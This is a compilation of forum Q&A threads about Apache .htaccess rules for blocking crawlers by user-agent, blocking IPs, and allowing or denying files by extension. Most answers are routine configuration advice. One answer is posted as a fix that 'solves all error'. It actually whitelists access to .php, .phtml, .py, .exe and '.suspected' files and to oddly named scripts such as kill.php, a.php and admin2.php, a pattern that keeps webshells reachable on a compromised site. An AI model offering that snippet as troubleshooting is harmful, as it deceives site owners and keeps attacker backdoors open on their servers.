Use .htaccess to Block Yandex, Baidu, and MJ12bot - .htaccess

I am so tired of Yandex, Baidu, and MJ12bot eating all my bandwidth. None of them even care about the useless robots.txt file.
I would also like to block any user-agent with the word "spider" in it.
I have been using the following code in my .htaccess file to look at the user-agent string and block them that way but it seems they still get through. Is this code correct? Is there a better way?
BrowserMatchNoCase "baidu" bots
BrowserMatchNoCase "yandex" bots
BrowserMatchNoCase "spider" bots
BrowserMatchNoCase "mj12bot" bots
Order Allow,Deny
Allow from ALL
Deny from env=bots

To block user agents, you can use :
SetEnvIfNoCase User-agent (yandex|baidu|foobar) not-allowed=1
Order Allow,Deny
Allow from ALL
Deny from env=not-allowed

Related

How to block yandex

I'm trying to block yandex from my site. I've tried the solutions posted in other threads but they are not working so I'm wondering if I am doing something wrong?
The user-agent string is:
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots
I have tried the following (one at a time). RewriteEngine is on
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
Order Allow,Deny
Deny from env=bad_bot_block
Allow from ALL
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
<RequireAll>
Require all granted
Require not env bad_bot_block
</RequireAll>
Can anyone see a reason one of the above won't work or have any other suggestions?
In case anyone else has this problem, the following worked for me:
RewriteCond %{HTTP_USER_AGENT} ^.*(yandex).*$ [NC]
RewriteRule .* - [F,L]
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
With the start and end-of-string anchors in the regex you are bascially checking that the User-Agent string is exactly equal to "yandex.com" (except that the . is any character), which clearly does not match the stated user-agent string.
You need to check that the User-Agent header contains "YandexBot" (or "yandex.com"). You can also use a case-sensitive match here, since the real Yandex bot does not vary the case.
For example, try the following instead:
SetEnvIf User-Agent "YandexBot" bad_bot_block
Consider using the BrowserMatch directive instead, which is a shortcut for SetEnvIf User-Agent.
If you are on Apache 2.4 then you should be using the Require (second) variant of your two code blocks. Order, Deny and Allow directives are Apache 2.2 and formerly deprecated on Apache 2.4.
However, consider using using robots.txt instead to block crawling in the first place. Yandex supposedly supports robots.txt.

.htaccess Blocking Useragents AND IPs AT THE SAME TIME not working

How do I block Useragents and IPs AT THE SAME TIME?
Currently using this
SetEnvIfNoCase User-Agent "Chrome/80" good_ua
SetEnvIfNoCase User-Agent "Chrome/81" good_ua
SetEnvIfNoCase User-Agent "Chrome/82" good_ua
SetEnvIfNoCase User-Agent "Chrome/83" good_ua
order deny,allow
deny from all
allow from env=good_ua
That white lists those UAs. But when I try adding this code
deny from 1.1.1.1
deny from 1.0.0.1
only blocking UA works, I can not make them both work at the time. I need to block IPs and allow certain UAs.

htaccess allowing access files by extension?

I saw several htaccess example disabling some files to access:
<Files ~ "\.(js|sql)$">
order deny,allow
deny from all
</Files>
for example, this prevents to access all .JS and .SQL files, the others are enabled. I want the contrary! I want those files to be ENABLED, all others to be prevented. How to achieve this?
Vorapsak's answer is almost correct. It's actually
order allow,deny
<Files ~ "\.(js|sql)$">
allow from all
</Files>
You need the order directive at the top (and you don't need anything else).
The interesting thing is, it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.
and a bit of explanation:
The order cause tells the server about its expected default behaviour. The
order allow,deny
tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaulated: if a request matches any deny directives, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.
The directive
order deny,allow
works the opposite way: first the server processes the "deny" directives: if a request matches, it's marked to be denied. Then the "allow" directives are evaulated: if a request matches an allow directive, it's allowed in, even if it matches a deny directive earlier. If a request matches nothing, the file is allowed.
In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.
If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.
oh and, one more thing: directives in a section (i.e. < Files> and < Directory>) are always evaulated after the main body of the .htaccess file, overwriting it. That's why Vorapsak's solution did not work as inteded: the main .htaccess denied the request, then the < Files> order was processed, and it allowed the request.
Htaccess is magic of the worst kind, but there's logic to it.
Did you try setting a
deny from all
outside (before) the tag, then changing the
deny from all
to
allow from all
inside? Something like
deny from all
<Files ~ "\.(js|sql)$">
order allow,deny
allow from all
</Files>
if you are having trouble with your website, use this htaccess code. It solves all error you may likely encounter
DirectoryIndex index.html index.php
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store).php$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If this help you, don't forget to thump up!!!

robots.txt htaccess block google

In my .htaccess file I have:
<Files ~ "\.(tpl|txt)$">
Order deny,allow
Deny from all
</Files>
This denies any text file from being read, but the Google search engine gives me the following error:
robots.txt Status
http://mysite/robots.txt
18 minutes ago 302 (Moved temporarily)
How can I modify .htaccess to permit Google to read robots.txt while prohibiting everyone else from accessing text files?
Use this:
<Files ~ "\.(tpl|txt)$">
Order deny,allow
Deny from all
SetEnvIfNoCase User-Agent "Googlebot" goodbot
Allow from env=goodbot
</Files>

Htaccess rewrite does not work

I was told that this is the right way to redirect anyone who is trying to open:
/users/username/something.txt
But i can't seem to get it work.
RewriteEngine on
RewriteRule \.txt$ /notallowed.html [F,L,NC]
Is this wrong?
The simplest way to deny users from all TXT files would be to use something like:
<FilesMatch "\.(txt)$">
Order Allow,Deny
Deny from all
</FilesMatch>
However, the code you have there should work for all intents and purposes. Depending on your server configuration, however, you may need to add "Options +FollowSymLinks".
If you decide to go the FilesMatch route, you can use ErrorDocument to control what page the user is taken to.

Resources